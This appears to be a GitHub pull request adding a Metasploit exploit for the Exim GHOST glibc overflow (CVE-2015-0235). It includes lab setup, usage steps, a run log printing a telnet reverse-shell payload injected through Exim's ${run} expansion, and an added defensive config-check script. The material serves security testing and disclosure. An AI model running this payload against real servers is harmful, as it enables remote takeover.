
Add CVE-2015-0235: Exim GHOST (glibc gethostbyname) Buffer Overflow #4956

Merged: 6 commits, Mar 20, 2015

Conversation

wchen-r7

This is an exploit for CVE-2015-0235, a heap buffer overflow vulnerability in glibc gethostbyname. It specifically targets Exim servers to prove exploitability. Originally written by Qualys.

I did the testing and made small changes to the modules:

  • I moved most of the module's description into a new wiki document, because there's so much info. You can read it here: http://r-7.co/1CAnMc0
  • All the fail_with messages will also refer to the same wiki doc
  • Other minor things like more references

Setup

  • To prepare a box for testing, please download Debian 7 and install it: http://ftp.cae.tntech.edu/debian-cd/dvd/debian-7.7.0-i386-DVD-1.iso
  • On the Debian box, open /etc/exim4/exim4.conf.template, and then add helo_verify_hosts = * under MAIN CONFIGURATION SETTINGS
  • Do: sudo update-exim4.conf
  • Do: sudo /etc/init.d/exim4 restart
  • Do: grep helo /var/lib/exim4/config.autogenerated | grep verify, and make sure you see helo_verify_hosts = *, like this:
$ grep helo /var/lib/exim4/config.autogenerated | grep verify
helo_verify_hosts = *

Now you are ready for testing.

If you can find me in person, you can try my box instead.

Verification

  • Start msfconsole
  • Do: use exploit/linux/smtp/exim_gethostbyname_bof
  • Do: set rhost [The Exim server's IP]
  • Do: set sender_host_address [Your IP]
  • Do: run
  • You should get a shell like the following demo:
msf exploit(exim_gethostbyname_bof) > run

[*] Started reverse double handler
[*] Trying information leak...
[!] {:heap_shift=>736}
[!] {:write_offset=>128, :error=>"503 sender not yet given"}
[!] {:write_offset=>136, :error=>"\xE0.\xFF\xB7\xE0.\xFF\xB7er not yet given"}
[!] {:error=>["\xE0.\xFF\xB7\xE0.\xFF\xB7er not yet given", "", "503 \x89\x10", "177", "177\\177\\177", "vJN\\177\\177\\177\\177"]}
[!] {:leaked_arch=>"x86"}
[!] {:count=>{"\xE0.\xFF\xB7\xE0.\xFF\xB7er not yet given"=>8, "hF\xFE\xB7hF\xFE\xB7er not yet given"=>2}}
[+] Successfully leaked_arch: x86
[+] Successfully leaked_addr: b7fda760
[*] Trying code execution...
[!] ${run{/usr/bin/env setsid /bin/sh -c "sh -c '(sleep 4011|telnet 192.168.1.64 4444|while : ; do sh && break; done 2>&1|telnet 192.168.1.64 4444 >/dev/null 2>&1 &)'"}}
[!] {:helo=>6144, :step=>6025, :addr=>"b7fda760", :offset=>21}
[!] {:reply=>{:code=>"250", :lines=>["250 Accepted\r\n"]}}
[!] {:helo=>6144, :step=>6025, :addr=>"b7fda760", :offset=>25}
[!] {:reply=>{:code=>"250", :lines=>["250 Accepted\r\n"]}}
[!] {:helo=>6144, :step=>6025, :addr=>"b7fd8fd7", :offset=>20}
[!] {:helo=>6144, :step=>6025, :addr=>"b7fd8fd7", :offset=>8}
[!] {:helo=>6144, :step=>6025, :addr=>"b7fd784e", :offset=>6}
[!] {:helo=>6144, :step=>6025, :addr=>"b7fd784e", :offset=>12}
[!] {:helo=>6144, :step=>6025, :addr=>"b7fd60c5", :offset=>19}
[!] {:helo=>6144, :step=>6025, :addr=>"b7fd60c5", :offset=>29}
[!] {:helo=>6144, :step=>6025, :addr=>"b7fd493c", :offset=>23}
[!] {:helo=>6144, :step=>6025, :addr=>"b7fd493c", :offset=>18}
[!] {:helo=>6144, :step=>6025, :addr=>"b7fd31b3", :offset=>14}
[!] {:helo=>6144, :step=>6025, :addr=>"b7fd31b3", :offset=>3}
[!] {:helo=>6144, :step=>6025, :addr=>"b7fd1a2a", :offset=>29}
[!] {:helo=>6144, :step=>6025, :addr=>"b7fd1a2a", :offset=>28}
[!] {:helo=>6144, :step=>6025, :addr=>"b7fd02a1", :offset=>26}
[!] {:reply=>{:code=>"550", :lines=>["550 sikVtqGxFOjCBOWTbDupmIuJRmLmShFNqqUYRRPUolyxPmmgLCenEzConuVGWafjgycyRfXulGNwmAOvkqZkGobMyUIMPojZsaziCjVVyvabOrcieEWrLZSgnCCXHeXjIzGGfUALAIubgBEmsKsSWSGa\r\n"]}}
[+] Brute-force SUCCESS
[+] Please wait for reply...
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo qaNpBmRBEus9XoVZ;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket A
[*] A: "qaNpBmRBEus9XoVZ\r\n"
[*] Matching...
[*] B is input...
[*] Command shell session 1 opened (192.168.1.64:4444 -> 192.168.1.166:58859) at 2015-03-19 03:36:52 -0500
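The setup above switches on helo_verify_hosts = * and confirms it with grep. As an added example (not part of this PR or of the Metasploit module), here is a POSIX shell check that performs the same inspection on an Exim 4 generated config and reports whether the HELO verification path, and with it the gethostbyname() call on the HELO argument, is enabled; the file paths and config fragments it reads are constructed samples.

```shell
#!/bin/sh
# Added example, not code from this PR or from the Metasploit module: it reads
# an Exim 4 generated configuration (on Debian, /var/lib/exim4/config.autogenerated)
# and reports whether helo_verify_hosts is set, the setting the PR's setup step
# enables so that Exim resolves the HELO argument via glibc gethostbyname().

# Print the value of the last uncommented "helo_verify_hosts = ..." line in the
# file given as $1, or nothing if the option is unset. Exim treats only lines
# whose first non-blank character is "#" as comments, so a "#" later in a line
# stays part of the value (assumption: one live assignment, as in the PR setup).
helo_verify_hosts_value() {
  grep -E '^[[:space:]]*helo_verify_hosts[[:space:]]*=' "$1" 2>/dev/null \
    | tail -n 1 \
    | sed -E 's/^[^=]*=[[:space:]]*//; s/[[:space:]]*$//'
}

# Exit status 0 when HELO verification is switched on for some host list,
# 1 when the option is absent or empty.
exim_helo_verify_enabled() {
  v=$(helo_verify_hosts_value "$1")
  [ -n "$v" ]
}

# One-line verdict for a config file, in the spirit of the PR's grep check.
report_exim_helo_verify() {
  if exim_helo_verify_enabled "$1"; then
    echo "$1: helo_verify_hosts = $(helo_verify_hosts_value "$1") -> Exim calls gethostbyname() on HELO; confirm glibc is patched for CVE-2015-0235"
  else
    echo "$1: helo_verify_hosts unset -> HELO verification path not enabled"
  fi
}

# Constructed sample fragments standing in for config.autogenerated.
exposed=$(mktemp)
cat >"$exposed" <<'EOF'
#                    MAIN CONFIGURATION SETTINGS                     #
  # helo_verify_hosts = *   (commented out: must be ignored)
helo_verify_hosts = *
acl_smtp_rcpt = acl_check_rcpt
EOF

unset_cfg=$(mktemp)
printf '# helo_verify_hosts = *\nacl_smtp_rcpt = acl_check_rcpt\n' >"$unset_cfg"

report_exim_helo_verify "$exposed"
report_exim_helo_verify "$unset_cfg"
rm -f "$exposed" "$unset_cfg"
```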

@wvu wvu self-assigned this Mar 19, 2015

void-in commented Mar 20, 2015

Shouldn't the I_KNOW_WHAT_I_AM_DOING be changed to FORCE_EXPLOIT or something which gives some idea what the option is doing?

@wchen-r7

Sure, we can do that.


wvu commented Mar 20, 2015

Good usability change. Thank you, @void-in.

fail_with("smtp_connect", "sock is nil") if not sock
@smtp_state = :recv

banner = smtp_recv(220)
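Review bot: `banner` on the last line is assigned from `smtp_recv(220)` but nothing in the visible lines reads it; either drop the assignment and call `smtp_recv(220)` for its side effect, or use the value (for instance log it in verbose output). Minor style point on the first line: `fail_with("smtp_connect", "sock is nil") if not sock` reads more idiomatically in Ruby as `... unless sock`.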
Contributor


I noticed that banner is not being used. Do you think it might be worthwhile to check for Exim in the 220?

Contributor Author


I don't think checking the banner is necessary, because if the check triggers the bug and tells you it's vulnerable, there is no point to trust the passive/banner check (or even look at it).

I can get rid of the banner variable if you want. I imagine they just wanted to make it obvious that this line is receiving the banner.

Contributor


Yeah, I agree. Remove it!

Contributor Author


ok.

@wvu wvu merged commit 1b67a06 into rapid7:master Mar 20, 2015
wvu added a commit that referenced this pull request Mar 20, 2015
@wchen-r7 wchen-r7 deleted the ghost branch August 22, 2016 16:30